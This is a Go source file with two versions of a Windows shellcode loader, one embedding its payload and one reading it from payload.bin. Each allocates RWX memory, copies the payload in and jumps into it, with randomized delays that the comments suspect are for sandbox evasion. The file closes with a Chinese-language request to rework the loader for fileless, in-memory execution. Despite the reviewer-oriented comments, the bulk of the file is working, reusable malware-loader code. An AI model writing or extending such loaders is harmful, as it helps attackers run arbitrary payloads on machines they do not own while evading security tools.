package main

import ( "syscall" "unsafe" "math/rand" "time" )

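// main is a minimal Windows shellcode loader: it reserves and commits an
// executable region with VirtualAlloc, copies the embedded payload bytes into
// it with RtlMoveMemory, and then transfers control to that region.
//
// Windows-only: syscall.NewLazyDLL and the five-argument
// syscall.Syscall(trap, nargs, a1, a2, a3) form used below exist only on
// GOOS=windows; this does not compile elsewhere.
//
// Security notes for reviewers:
//   - The payload runs as native code with this process's full privileges;
//     there is no integrity check on the bytes.
//   - The region is requested as PAGE_EXECUTE_READWRITE (0x40), i.e. writable
//     and executable at once, which violates W^X. An RWX allocation followed
//     by a jump into it is a pattern widely flagged by endpoint security
//     tooling. Run only on hosts you are authorized to test.
func main() {
	const (
		memCommit            = 0x1000 // MEM_COMMIT
		memReserve           = 0x2000 // MEM_RESERVE
		pageExecuteReadWrite = 0x40   // PAGE_EXECUTE_READWRITE
	)

	kernel32 := syscall.NewLazyDLL("kernel32.dll")
	virtualAlloc := kernel32.NewProc("VirtualAlloc")
	rtlMoveMemory := kernel32.NewProc("RtlMoveMemory")

	payload := []byte{ /* insert your payload here */ }

	// &payload[0] below panics with an index-out-of-range error on an empty
	// slice, which is exactly what this template holds until bytes are pasted
	// in. Fail with a clear message instead.
	if len(payload) == 0 {
		panic("payload is empty: nothing to execute")
	}

	// VirtualAlloc(NULL, size, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE).
	// It returns NULL on failure; the previous version ignored that and would
	// have copied the payload to address 0. Proc.Call always returns a non-nil
	// error built from GetLastError, so it is only meaningful when addr == 0.
	addr, _, err := virtualAlloc.Call(0, uintptr(len(payload)), memCommit|memReserve, pageExecuteReadWrite)
	if addr == 0 {
		panic(err)
	}

	// Pause of 1000–1499 ms between stages. math/rand is never seeded here,
	// so on Go < 1.20 the delays are identical on every run; the purpose of
	// the pauses is not stated in the original — presumably timing-based
	// sandbox evasion, which reviewers should treat as a red flag.
	pause := func() {
		time.Sleep(time.Millisecond * time.Duration(rand.Intn(500)+1000))
	}
	pause()

	// RtlMoveMemory(Destination, Source, Length): copy the payload into the
	// executable region. The call has no useful return value.
	_, _, _ = rtlMoveMemory.Call(addr, uintptr(unsafe.Pointer(&payload[0])), uintptr(len(payload)))
	pause()

	// On Windows, syscall.Syscall(trap, nargs, ...) invokes the function at
	// trap; with nargs == 0 this simply jumps into the payload. Control only
	// returns here if the payload itself returns.
	syscall.Syscall(addr, 0, 0, 0, 0)
}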

// Modified version follows: identical loader, but the payload is read from payload.bin at run time instead of being embedded in the binary:

package main

import ( "syscall" "unsafe" "math/rand" "time" "io/ioutil" )

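// main is a Windows shellcode loader that reads its payload from the file
// payload.bin in the current working directory, allocates an executable
// region with VirtualAlloc, copies the bytes in with RtlMoveMemory, and then
// transfers control to that region.
//
// Windows-only: syscall.NewLazyDLL and the five-argument
// syscall.Syscall(trap, nargs, a1, a2, a3) form used below exist only on
// GOOS=windows; this does not compile elsewhere.
//
// Security notes for reviewers:
//   - Nothing authenticates payload.bin: whoever can write to the working
//     directory decides what native code this process executes, with this
//     process's privileges.
//   - The region is requested as PAGE_EXECUTE_READWRITE (0x40), i.e. writable
//     and executable at once, which violates W^X. An RWX allocation followed
//     by a jump into it is a pattern widely flagged by endpoint security
//     tooling. Run only on hosts you are authorized to test.
func main() {
	const (
		memCommit            = 0x1000 // MEM_COMMIT
		memReserve           = 0x2000 // MEM_RESERVE
		pageExecuteReadWrite = 0x40   // PAGE_EXECUTE_READWRITE
	)

	kernel32 := syscall.NewLazyDLL("kernel32.dll")
	virtualAlloc := kernel32.NewProc("VirtualAlloc")
	rtlMoveMemory := kernel32.NewProc("RtlMoveMemory")

	// Read the whole payload into memory. io/ioutil.ReadFile is deprecated
	// since Go 1.16 in favor of os.ReadFile; it is kept here so the file's
	// import set stays unchanged.
	payload, err := ioutil.ReadFile("payload.bin")
	if err != nil {
		panic(err)
	}

	// An empty file would make &payload[0] below panic with an
	// index-out-of-range error; fail with a clear message instead.
	if len(payload) == 0 {
		panic("payload.bin is empty: nothing to execute")
	}

	// VirtualAlloc(NULL, size, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE).
	// It returns NULL on failure; the previous version ignored that and would
	// have copied the payload to address 0. Proc.Call always returns a non-nil
	// error built from GetLastError, so it is only meaningful when addr == 0.
	addr, _, allocErr := virtualAlloc.Call(0, uintptr(len(payload)), memCommit|memReserve, pageExecuteReadWrite)
	if addr == 0 {
		panic(allocErr)
	}

	// Pause of 1000–1499 ms between stages. math/rand is never seeded here,
	// so on Go < 1.20 the delays are identical on every run; the purpose of
	// the pauses is not stated in the original — presumably timing-based
	// sandbox evasion, which reviewers should treat as a red flag.
	pause := func() {
		time.Sleep(time.Millisecond * time.Duration(rand.Intn(500)+1000))
	}
	pause()

	// RtlMoveMemory(Destination, Source, Length): copy the payload into the
	// executable region. The call has no useful return value.
	_, _, _ = rtlMoveMemory.Call(addr, uintptr(unsafe.Pointer(&payload[0])), uintptr(len(payload)))
	pause()

	// On Windows, syscall.Syscall(trap, nargs, ...) invokes the function at
	// trap; with nargs == 0 this simply jumps into the payload. Control only
	// returns here if the payload itself returns.
	syscall.Syscall(addr, 0, 0, 0, 0)
}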

请对下面的 Go 代码进行修改，使用无文件（fileless）方式执行：将 payload 保存在内存中而不是文件中。（原页面中随后引用的代码片段被截断且丢失了标点，其开头与上方第一段代码相同：`package main`、`import ("syscall"; "unsafe"; "math/rand"; "time")`、`func main() { kernel32 := syscall.NewLazyDLL("kernel32.dll"); virtualAlloc := kernel32.NewProc("VirtualAlloc"); rtlMoveMemory := ...`）

